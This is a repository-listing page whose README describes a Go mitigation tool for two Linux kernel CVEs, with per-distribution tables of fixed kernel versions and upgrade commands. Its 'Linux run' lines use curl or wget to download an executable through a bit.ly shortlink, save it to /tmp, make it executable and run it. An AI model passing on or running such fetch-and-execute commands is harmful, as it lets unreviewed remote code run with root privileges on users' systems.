https://github.com/attaattaatta/cve-2026-43284
CVE-2026-31431 + CVE-2026-43284 golang hotfix
https://github.com/attaattaatta/cve-2026-43284
cve-2026-31431 hotfix
Last synced: about 1 month ago
JSON representation
CVE-2026-31431 + CVE-2026-43284 golang hotfix
- Host: GitHub
- URL: https://github.com/attaattaatta/cve-2026-43284
- Owner: attaattaatta
- Created: 2026-04-30T12:27:15.000Z (about 2 months ago)
- Default Branch: master
- Last Pushed: 2026-05-08T18:44:54.000Z (about 1 month ago)
- Last Synced: 2026-05-08T19:09:21.951Z (about 1 month ago)
- Topics: cve-2026-31431, hotfix
- Language: Go
- Homepage:
- Size: 42 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2026-43284 / Dirty Frag mitigation (esp4, esp6, rxrpc)
## Описание
- отключает `esp4, esp6, rxrpc`
- блокирует загрузку через `modprobe`
## Description
- disables `esp4, esp6, rxrpc`
- blocks module loading via `modprobe`
## Linux run
```bash
b="/tmp/cve_2026_43284_hotfix"; wget -qO $b $(wget -qO- https://bit.ly/4elJXcG | grep browser_download_url | grep -v .exe | cut -d '"' -f 4) && chmod +x $b && $b
```
или
```bash
b="/tmp/cve_2026_43284_hotfix"; curl -fsSL "$(curl -fsSL https://bit.ly/4elJXcG | grep browser_download_url | grep -v .exe | cut -d '"' -f 4)" -o $b && chmod +x $b && $b
```
## Linux build
```bash
docker run --rm -v "$PWD":/app -w /app golang:alpine sh -c "apk add --no-cache upx && go build -ldflags='-s -w' -o cve_2026_43284_hotfix cve_2026_43284_hotfix.go && upx --best --ultra-brute cve_2026_43284_hotfix"
```
## Fixed kernel versions
| OS | kernel |
|---------|---------|
| Debian 10 (buster) | security backport not yet available |
| Debian 11 (bullseye) | not yet available |
| Debian 12 (bookworm) | not yet available |
| Debian 13 (trixie) | not yet available |
Debian fix command:
```bash
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
```
| OS | kernel|
|---------|---------|
| Ubuntu 18.04 (bionic) | security backport not yet available |
| Ubuntu 20.04 (focal) | security backport not yet available |
| Ubuntu 22.04 (jammy) | not yet available |
| Ubuntu 24.04 (noble) | not yet available |
| Ubuntu 25.04 (plucky) | not yet available |
| Ubuntu 26.04 (resolute) | not yet available |
Ubuntu fix command:
```bash
apt update && apt install linux-image-generic linux-headers-generic -y
```
| OS | kernel |
|---------|---------|
| CentOS Stream 8 | security backport not yet available |
| CentOS Stream 9 | not yet available |
| CentOS Stream 10 | not yet available |
CentOS fix commands:
```bash
yum upgrade kernel -y
yum upgrade kernel-uek -y
```
| OS | kernel |
|---------|---------|
| AlmaLinux 8.10 | 4.18.0-553.123.2.el8_10.x86_64 |
| AlmaLinux 9.7 | 5.14.0-611.54.3.el9_7.x86_64 |
| AlmaLinux 10.1 | 6.12.0-124.55.3.el10_1.x86_64 |
AlmaLinux fix command:
```bash
dnf clean metadata && dnf upgrade kernel -y
```
| OS | kernel |
|---------|---------|
| Rocky Linux 8.10 | not yet available |
| Rocky Linux 9.7 | not yet available |
| Rocky Linux 10.1 | not yet available |
Rocky Linux fix command:
```bash
dnf upgrade kernel -y
```
| OS | kernel |
|---------|---------|
| Fedora 40 | security backport not yet available |
| Fedora 41 | security backport not yet available |
| Fedora 42 | not yet available |
| Fedora 43 | not yet availablee |
Fedora fix command:
```bash
dnf upgrade kernel -y
```
# CVE-2026-31431 / Copy Fail mitigation (algif_aead)
## Описание
Утилита проверяет уязвимость **CVE-2026-31431** (pre condition) и при наличии root-привилегий применяет mitigation:
- определяет защищённые комбинации ОС (включая WSL) и версий ядра
- предлагает обновление ядра с исправлением если оно доступно
- отключает `algif_aead`
- блокирует загрузку через `modprobe`
- добавляет `initcall_blacklist=algif_aead_init`
- ограничивает `AF_ALG` через systemd
## Description
This tool checks for **CVE-2026-31431** (pre condition) and applies mitigation (requires root):
- identifies protected combinations of OS (including WSL) and kernel versions
- offers a kernel update with a fix if available
- disables `algif_aead`
- blocks module loading via `modprobe`
- adds `initcall_blacklist=algif_aead_init`
- restricts `AF_ALG` via systemd
## Fixed kernel versions
| OS | kernel |
|---------|---------|
| Debian 10 (buster) | security backport not yet available |
| Debian 11 (bullseye) | 5.10.0-41 and above |
| Debian 12 (bookworm) | 6.1.0-45 and above |
| Debian 13 (trixie) | 6.12.85-1 and above |
Debian fix command:
```bash
apt update && apt install linux-image-amd64 linux-headers-amd64 -y
```
| OS | kernel|
|---------|---------|
| Ubuntu 18.04 (bionic) | security backport not yet available |
| Ubuntu 20.04 (focal) | security backport not yet available |
| Ubuntu 22.04 (jammy) | 5.15.0-177-generic and above |
| Ubuntu 24.04 (noble) | 6.8.0-111-generic and above |
| Ubuntu 25.04 (plucky) | 6.14.0-37-generic and above |
| Ubuntu 26.04 (resolute) | 7.0.0-15-generic and above |
Ubuntu fix command:
```bash
apt update && apt install linux-image-generic linux-headers-generic -y
```
| OS | kernel |
|---------|---------|
| CentOS Stream 8 | security backport not yet available |
| CentOS Stream 9 | not yet available |
| CentOS Stream 10 | not yet available |
CentOS fix commands:
```bash
yum upgrade kernel -y
yum upgrade kernel-uek -y
```
| OS | kernel |
|---------|---------|
| AlmaLinux 8.10 | 4.18.0-553.121.1.el8_10.x86_64 and above |
| AlmaLinux 9.7 | 5.14.0-611.49.2.el9_7.x86_64 and above |
| AlmaLinux 10.1 | 6.12.0-124.52.3.el10_1.x86_64 and above |
AlmaLinux fix command:
```bash
dnf clean metadata && dnf upgrade kernel -y
```
| OS | kernel |
|---------|---------|
| Rocky Linux 8.10 | 4.18.0-553.123.1.el8_10 |
| Rocky Linux 9.7 | 5.14.0-611.54.1.el9_7.x86_64 |
| Rocky Linux 10.1 | 6.12.0-124.55.1.el10_1.x86_64 |
Rocky Linux fix command:
```bash
dnf upgrade kernel -y
```
| OS | kernel |
|---------|---------|
| Fedora 40 | security backport not yet available |
| Fedora 41 | security backport not yet available |
| Fedora 42 | 6.19.14-100.fc42.x86_64 and above |
| Fedora 43 | 6.19.14-200.fc43.x86_64 and above |
Fedora fix command:
```bash
dnf upgrade kernel -y
```
| OS | kernel |
|---------|---------|
| Oracle Linux 8 | 5.15.0-319.201.4.4.el8uek.x86_64 and above |
| Oracle Linux 9 | 6.12.0-201.74.2.2.el9uek.x86_64 and above |
| Oracle Linux 10 | 6.12.0-201.74.2.2.el10uek.x86_64 and above |
Oracle Linux fix commands:
```bash
yum upgrade kernel kernel-uek -y
```